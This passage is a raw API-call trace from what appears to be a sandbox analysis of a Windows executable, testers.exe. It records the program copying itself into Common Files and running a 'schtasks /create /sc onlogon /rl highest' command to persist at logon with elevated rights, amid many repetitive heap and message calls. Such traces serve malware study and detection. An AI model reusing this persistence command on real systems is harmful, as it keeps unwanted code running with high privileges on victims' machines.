[0072.505] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.505] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.505] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.505] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.505] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.505] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.506] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.506] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.506] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.506] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.506] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.506] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.506] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.506] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.506] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.506] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.506] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.506] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.506] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.506] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.506] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.506] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.506] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.506] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.506] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.506] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.506] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.506] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.506] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.506] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.506] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.506] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.506] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.506] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.507] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.507] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.507] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.507] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.507] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.507] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.507] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.507] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.507] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0072.510] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0072.516] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0072.531] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0072.649] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0072.687] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0072.706] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0072.732] FindFirstFileW (in: lpFileName="C:\\PROGRA~2\\COMMON~1\\26207383702620738370", lpFindFileData=0x61f2b8 | out: lpFindFileData=0x61f2b8*(dwFileAttributes=0xa, ftCreationTime.dwLowDateTime=0x1317ae, ftCreationTime.dwHighDateTime=0xfffffffe, ftLastAccessTime.dwLowDateTime=0x77c6e36c, ftLastAccessTime.dwHighDateTime=0x77c6e0d2, ftLastWriteTime.dwLowDateTime=0x76a670, ftLastWriteTime.dwHighDateTime=0x30, nFileSizeHigh=0x1, nFileSizeLow=0x0, dwReserved0=0x650000, dwReserved1=0x770f98, cFileName="紖\x0b뒰t", cAlternateFileName="")) returned 0xffffffff [0072.732] CharUpperBuffW (in: lpsz="STARTUP", cchLength=0x7 | out: lpsz="STARTUP") returned 0x7 [0072.732] FindFirstFileW (in: lpFileName="C:\\PROGRA~2\\COMMON~1\\26207383702620738370", lpFindFileData=0x61f060 | out: lpFindFileData=0x61f060*(dwFileAttributes=0xa, ftCreationTime.dwLowDateTime=0x1317ae, ftCreationTime.dwHighDateTime=0xfffffffe, ftLastAccessTime.dwLowDateTime=0x77c6e36c, ftLastAccessTime.dwHighDateTime=0x77c6e0d2, ftLastWriteTime.dwLowDateTime=0x76a928, ftLastWriteTime.dwHighDateTime=0x30, nFileSizeHigh=0x1, nFileSizeLow=0x0, dwReserved0=0x650000, dwReserved1=0x770f98, cFileName="紜\x0b", cAlternateFileName="")) returned 0xffffffff [0072.733] GetFullPathNameW (in: lpFileName="C:\\Users\\5P5NRG~1\\Desktop\\testers.exe", nBufferLength=0x7fff, lpBuffer=0x60f100, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5P5NRG~1\\Desktop\\testers.exe", lpFilePart=0x0) returned 0x25 [0072.733] GetFullPathNameW (in: lpFileName="C:\\PROGRA~2\\COMMON~1", nBufferLength=0x7fff, lpBuffer=0x60f100, lpFilePart=0x0 | out: lpBuffer="C:\\PROGRA~2\\COMMON~1", lpFilePart=0x0) returned 0x14 [0072.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:", cchCount1=2, lpString2="C:", cchCount2=2) returned 2 [0072.734] FindFirstFileW (in: lpFileName="C:\\Users\\5P5NRG~1\\Desktop\\testers.exe", lpFindFileData=0x61f118 | out: lpFindFileData=0x61f118*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc1a62260, ftCreationTime.dwHighDateTime=0x1d661bd, ftLastAccessTime.dwLowDateTime=0xc1a62260, ftLastAccessTime.dwHighDateTime=0x1d661bd, ftLastWriteTime.dwLowDateTime=0xc3764e80, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0xdc800, dwReserved0=0x61f2a8, dwReserved1=0x1ca9d, cFileName="testers.exe", cAlternateFileName="")) returned 0x6c9398 [0072.734] FindFirstFileW (in: lpFileName="C:\\PROGRA~2\\COMMON~1\\testers.exe", lpFindFileData=0x61eea8 | out: lpFindFileData=0x61eea8*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x1, ftCreationTime.dwHighDateTime=0x20048, ftLastAccessTime.dwLowDateTime=0x7, ftLastAccessTime.dwHighDateTime=0xc2227, ftLastWriteTime.dwLowDateTime=0x2, ftLastWriteTime.dwHighDateTime=0x77c6e36c, nFileSizeHigh=0x77b42aae, nFileSizeLow=0x61f3bc, dwReserved0=0x6501ec, dwReserved1=0x650000, cFileName="!P\x01", cAlternateFileName="\x16")) returned 0xffffffff [0072.734] CopyFileExW (lpExistingFileName="C:\\Users\\5P5NRG~1\\Desktop\\testers.exe" (normalized: "c:\\users\\5p5nrg~1\\desktop\\testers.exe"), lpNewFileName="C:\\PROGRA~2\\COMMON~1\\testers.exe" (normalized: "c:\\progra~2\\common~1\\testers.exe"), lpProgressRoutine=0x0, lpData=0x0, pbCancel=0x61f0fc, dwCopyFlags=0x8) returned 1 [0072.780] FindNextFileW (in: hFindFile=0x6c9398, lpFindFileData=0x61f118 | out: lpFindFileData=0x61f118*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc1a62260, ftCreationTime.dwHighDateTime=0x1d661bd, ftLastAccessTime.dwLowDateTime=0xc1a62260, ftLastAccessTime.dwHighDateTime=0x1d661bd, ftLastWriteTime.dwLowDateTime=0xc3764e80, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0xdc800, dwReserved0=0x61f2a8, dwReserved1=0x1ca9d, cFileName="testers.exe", cAlternateFileName="")) returned 0 [0072.781] FindClose (in: hFindFile=0x6c9398 | out: hFindFile=0x6c9398) returned 1 [0072.781] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b4f8 | out: hHeap=0x650000) returned 1 [0072.781] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690590 | out: hHeap=0x650000) returned 1 [0072.781] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b228 | out: hHeap=0x650000) returned 1 [0072.781] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690690 | out: hHeap=0x650000) returned 1 [0072.781] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x764cc0 | out: hHeap=0x650000) returned 1 [0072.781] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690640 | out: hHeap=0x650000) returned 1 [0072.781] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x75b138 | out: hHeap=0x650000) returned 1 [0072.781] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690870 | out: hHeap=0x650000) returned 1 [0072.781] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x764c48 | out: hHeap=0x650000) returned 1 [0072.781] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690860 | out: hHeap=0x650000) returned 1 [0072.781] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6d32c8 | out: hHeap=0x650000) returned 1 [0072.781] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690650 | out: hHeap=0x650000) returned 1 [0072.781] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a928 | out: hHeap=0x650000) returned 1 [0072.781] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a670 | out: hHeap=0x650000) returned 1 [0072.781] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a6a0 | out: hHeap=0x650000) returned 1 [0072.781] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a748 | out: hHeap=0x650000) returned 1 [0072.781] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cd98 | out: hHeap=0x650000) returned 1 [0072.781] PeekMessageW (in: lpMsg=0x61f52c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f52c) returned 0 [0072.781] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cd98 [0072.781] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a748 [0072.782] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690650 [0072.782] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x691578 [0072.782] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690860 [0072.782] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x61ef80, nSize=0x104 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0072.782] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a6a0 [0072.782] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b4f8 [0072.782] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690870 [0072.782] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x691578 | out: hHeap=0x650000) returned 1 [0072.782] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690860 | out: hHeap=0x650000) returned 1 [0072.782] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690860 [0072.782] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9508 [0072.782] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a670 [0072.782] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a670 | out: hHeap=0x650000) returned 1 [0072.782] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a670 [0072.782] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x110) returned 0x691578 [0072.782] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b4f8 | out: hHeap=0x650000) returned 1 [0072.782] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a670 | out: hHeap=0x650000) returned 1 [0072.782] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a670 [0072.782] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a670 | out: hHeap=0x650000) returned 1 [0072.782] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a670 [0072.782] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a670 | out: hHeap=0x650000) returned 1 [0072.782] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a670 [0072.782] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a670 | out: hHeap=0x650000) returned 1 [0072.782] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a670 [0072.783] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a670 | out: hHeap=0x650000) returned 1 [0072.783] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a670 [0072.783] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a670 | out: hHeap=0x650000) returned 1 [0072.783] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9508 | out: hHeap=0x650000) returned 1 [0072.783] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690860 | out: hHeap=0x650000) returned 1 [0072.783] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690650 | out: hHeap=0x650000) returned 1 [0072.783] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a670 [0072.783] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690650 [0072.783] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a928 [0072.783] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690650 | out: hHeap=0x650000) returned 1 [0072.783] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b228 [0072.783] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690650 [0072.783] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x691690 [0072.783] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690860 [0072.783] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x691690 | out: hHeap=0x650000) returned 1 [0072.783] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690860 | out: hHeap=0x650000) returned 1 [0072.783] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690650 | out: hHeap=0x650000) returned 1 [0072.783] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xf8) returned 0x691690 [0072.783] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x2) returned 0x690650 [0072.783] GetCurrentDirectoryW (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x26 [0072.783] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4e) returned 0x6d32c8 [0072.783] GetCurrentDirectoryW (in: nBufferLength=0x26, lpBuffer=0x6d32c8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0072.783] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="C:\\Windows\\system32\\cmd.exe /c schtasks /create /sc onlogon /tn 2620738370 /rl highest /tr C:\\PROGRA~2\\COMMON~1\\testers.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x61f3d0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x61f398 | out: lpCommandLine="C:\\Windows\\system32\\cmd.exe /c schtasks /create /sc onlogon /tn 2620738370 /rl highest /tr C:\\PROGRA~2\\COMMON~1\\testers.exe", lpProcessInformation=0x61f398*(hProcess=0x134, hThread=0x128, dwProcessId=0x704, dwThreadId=0x4fc)) returned 1 [0072.792] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x691690 | out: hHeap=0x650000) returned 1 [0072.792] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6d32c8 | out: hHeap=0x650000) returned 1 [0072.792] CloseHandle (hObject=0x128) returned 1 [0072.792] CloseHandle (hObject=0x134) returned 1 [0072.792] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x691578 | out: hHeap=0x650000) returned 1 [0072.792] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690870 | out: hHeap=0x650000) returned 1 [0072.792] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a6a0 | out: hHeap=0x650000) returned 1 [0072.793] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a748 | out: hHeap=0x650000) returned 1 [0072.793] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a928 | out: hHeap=0x650000) returned 1 [0072.793] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a670 | out: hHeap=0x650000) returned 1 [0072.793] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b228 | out: hHeap=0x650000) returned 1 [0072.793] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cd98 | out: hHeap=0x650000) returned 1 [0072.793] PeekMessageW (in: lpMsg=0x61f52c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f52c) returned 0 [0072.793] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6c9358 | out: hHeap=0x650000) returned 1 [0072.793] PeekMessageW (in: lpMsg=0x61f52c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f52c) returned 0 [0072.793] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b4b0 | out: hHeap=0x650000) returned 1 [0072.793] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1e0 | out: hHeap=0x650000) returned 1 [0072.793] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0072.793] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690870 [0072.793] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cd98 [0072.793] CharUpperBuffW (in: lpsz="START_THE_SHOW", cchLength=0xe | out: lpsz="START_THE_SHOW") returned 0xe [0072.793] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cd98 | out: hHeap=0x650000) returned 1 [0072.793] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690870 | out: hHeap=0x650000) returned 1 [0072.793] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76b1e0 [0072.793] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b4b0 [0072.793] PeekMessageW (in: lpMsg=0x61f52c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f52c) returned 0 [0072.793] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690870 [0072.793] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cd98 [0072.793] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b228 [0072.793] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690860 [0072.793] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a670 [0072.793] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690860 | out: hHeap=0x650000) returned 1 [0072.793] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a928 [0072.793] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690860 [0072.794] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a748 [0072.794] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690860 | out: hHeap=0x650000) returned 1 [0072.794] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a6a0 [0072.794] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a760 [0072.794] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690860 [0072.794] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a910 [0072.794] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690640 [0072.794] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b240 [0072.794] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690690 [0072.794] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a658 [0072.794] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690590 [0072.794] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690600 [0072.794] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x90) returned 0x691e18 [0072.794] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a658 | out: hHeap=0x650000) returned 1 [0072.794] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x80) returned 0x691578 [0072.794] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x691e18 | out: hHeap=0x650000) returned 1 [0072.794] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690600 | out: hHeap=0x650000) returned 1 [0072.794] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690600 [0072.794] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a658 [0072.794] CharUpperBuffW (in: lpsz="HKLM64", cchLength=0x6 | out: lpsz="HKLM64") returned 0x6 [0072.794] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a640 [0072.794] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690630 [0072.794] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a640 | out: hHeap=0x650000) returned 1 [0072.794] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690630 | out: hHeap=0x650000) returned 1 [0072.794] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a658 | out: hHeap=0x650000) returned 1 [0072.794] 